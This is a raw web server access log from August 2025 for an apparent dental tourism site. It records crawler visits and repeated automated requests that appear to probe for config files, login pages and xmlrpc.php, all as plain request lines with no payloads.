173.252.83.4 - - [12/Aug/2025:03:06:34 -0400] "GET /teeth-aligners HTTP/1.1" 301 245 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
206.189.247.132 - - [12/Aug/2025:03:09:31 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
164.90.241.135 - - [12/Aug/2025:03:09:31 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
146.190.11.185 - - [12/Aug/2025:03:09:31 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
159.203.144.167 - - [12/Aug/2025:03:09:31 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
216.73.216.186 - - [12/Aug/2025:03:09:55 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
206.189.247.132 - - [12/Aug/2025:03:10:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
68.183.245.101 - - [12/Aug/2025:03:10:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [12/Aug/2025:03:10:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [12/Aug/2025:03:10:22 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
216.73.216.186 - - [12/Aug/2025:03:10:41 -0400] "GET /main HTTP/1.1" 301 235 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.186 - - [12/Aug/2025:03:10:41 -0400] "GET /wp-admin HTTP/1.1" 301 239 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
108.174.2.217 - - [12/Aug/2025:03:11:28 -0400] "GET / HTTP/1.1" 301 231 "-" "LinkedInBot/1.0 (compatible; Mozilla/5.0; Apache-HttpClient +http://www.linkedin.com)"
149.102.237.41 - - [12/Aug/2025:03:12:29 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
209.38.125.40 - - [12/Aug/2025:03:12:29 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.22.91.139 - - [12/Aug/2025:03:12:29 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
156.146.41.222 - - [12/Aug/2025:03:12:29 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
152.42.157.60 - - [12/Aug/2025:03:13:21 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
159.89.216.7 - - [12/Aug/2025:03:13:21 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
174.138.112.39 - - [12/Aug/2025:03:13:21 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
170.64.252.169 - - [12/Aug/2025:03:13:21 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
216.73.216.186 - - [12/Aug/2025:03:13:49 -0400] "GET /.well-known/acme-challenge/EUU7UFICLG5Y863AOZBVB518R9S4P22X HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.186 - - [12/Aug/2025:03:13:54 -0400] "GET /.well-known/acme-challenge/5O-CEHQUKH0M-8I0UAOR8O49P07GC91K HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
50.31.235.131 - - [12/Aug/2025:03:14:10 -0400] "HEAD /Config/net HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
66.220.149.112 - - [12/Aug/2025:03:16:44 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
209.38.125.40 - - [12/Aug/2025:03:24:23 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
146.190.203.144 - - [12/Aug/2025:03:24:24 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
144.126.240.247 - - [12/Aug/2025:03:24:24 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
146.190.190.67 - - [12/Aug/2025:03:24:24 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
68.183.245.101 - - [12/Aug/2025:03:26:13 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [12/Aug/2025:03:26:13 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [12/Aug/2025:03:26:13 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [12/Aug/2025:03:26:13 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.102.237.41 - - [12/Aug/2025:03:26:15 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
209.38.125.40 - - [12/Aug/2025:03:26:15 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.22.91.139 - - [12/Aug/2025:03:26:15 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
156.146.41.222 - - [12/Aug/2025:03:26:15 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
4.43.184.114 - - [12/Aug/2025:03:30:16 -0400] "GET / HTTP/1.0" 301 231 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
86.8.204.43 - - [12/Aug/2025:03:40:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
68.183.245.101 - - [12/Aug/2025:03:40:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [12/Aug/2025:03:40:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [12/Aug/2025:03:40:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [12/Aug/2025:03:42:22 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
146.190.11.185 - - [12/Aug/2025:03:42:22 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
164.90.241.135 - - [12/Aug/2025:03:42:22 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
159.203.144.167 - - [12/Aug/2025:03:42:22 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
152.42.157.60 - - [12/Aug/2025:03:42:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
159.89.216.7 - - [12/Aug/2025:03:42:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
174.138.112.39 - - [12/Aug/2025:03:42:23 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
170.64.252.169 - - [12/Aug/2025:03:42:23 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.102.237.41 - - [12/Aug/2025:03:42:25 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
209.38.125.40 - - [12/Aug/2025:03:42:25 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.22.91.139 - - [12/Aug/2025:03:42:25 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
156.146.41.222 - - [12/Aug/2025:03:42:25 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
51.68.111.219 - - [12/Aug/2025:03:44:34 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
51.68.111.219 - - [12/Aug/2025:03:44:35 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
209.38.125.40 - - [12/Aug/2025:03:52:37 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
146.190.203.144 - - [12/Aug/2025:03:52:37 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
144.126.240.247 - - [12/Aug/2025:03:52:37 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
146.190.190.67 - - [12/Aug/2025:03:52:37 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
68.183.245.101 - - [12/Aug/2025:03:56:07 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [12/Aug/2025:03:56:07 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [12/Aug/2025:03:56:08 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [12/Aug/2025:03:56:08 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.102.237.41 - - [12/Aug/2025:03:56:40 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
209.38.125.40 - - [12/Aug/2025:03:56:40 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.22.91.139 - - [12/Aug/2025:03:56:40 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
156.146.41.222 - - [12/Aug/2025:03:56:40 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
66.249.74.14 - - [12/Aug/2025:04:01:37 -0400] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.183 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
206.189.247.132 - - [12/Aug/2025:04:10:31 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
68.183.245.101 - - [12/Aug/2025:04:10:31 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [12/Aug/2025:04:10:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [12/Aug/2025:04:10:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.102.237.41 - - [12/Aug/2025:04:12:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
209.38.125.40 - - [12/Aug/2025:04:12:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.22.91.139 - - [12/Aug/2025:04:12:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
156.146.41.222 - - [12/Aug/2025:04:12:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
146.190.11.185 - - [12/Aug/2025:04:14:03 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [12/Aug/2025:04:14:03 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
164.90.241.135 - - [12/Aug/2025:04:14:03 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
159.203.144.167 - - [12/Aug/2025:04:14:03 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
152.42.157.60 - - [12/Aug/2025:04:15:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
159.89.216.7 - - [12/Aug/2025:04:15:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
174.138.112.39 - - [12/Aug/2025:04:15:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
170.64.252.169 - - [12/Aug/2025:04:15:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
91.191.209.102 - - [12/Aug/2025:04:23:03 -0400] "POST /dental-tourism/teeth-implant/xmlrpc.php HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0"
209.38.125.40 - - [12/Aug/2025:04:24:04 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
144.126.240.247 - - [12/Aug/2025:04:24:05 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
146.190.203.144 - - [12/Aug/2025:04:24:05 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
146.190.190.67 - - [12/Aug/2025:04:24:05 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
156.228.117.67 - - [12/Aug/2025:04:24:17 -0400] "POST /dental-tourism/teeth-implant/xmlrpc.php HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0"
156.253.164.19 - - [12/Aug/2025:04:24:55 -0400] "POST /dental-tourism/teeth-implant/xmlrpc.php HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
68.183.245.101 - - [12/Aug/2025:04:25:24 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [12/Aug/2025:04:25:24 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [12/Aug/2025:04:25:24 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [12/Aug/2025:04:25:24 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
156.228.93.143 - - [12/Aug/2025:04:25:36 -0400] "POST /dental-tourism/teeth-implant/xmlrpc.php HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
156.253.175.245 - - [12/Aug/2025:04:26:12 -0400] "POST /dental-tourism/teeth-implant/xmlrpc.php HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
149.102.237.41 - - [12/Aug/2025:04:26:49 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
209.38.125.40 - - [12/Aug/2025:04:26:50 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.22.91.139 - - [12/Aug/2025:04:26:50 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
156.146.41.222 - - [12/Aug/2025:04:26:50 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
91.191.209.102 - - [12/Aug/2025:04:26:55 -0400] "GET /dental-tourism/teeth-implant/wp-login.php HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0"
216.73.216.186 - - [12/Aug/2025:04:28:26 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
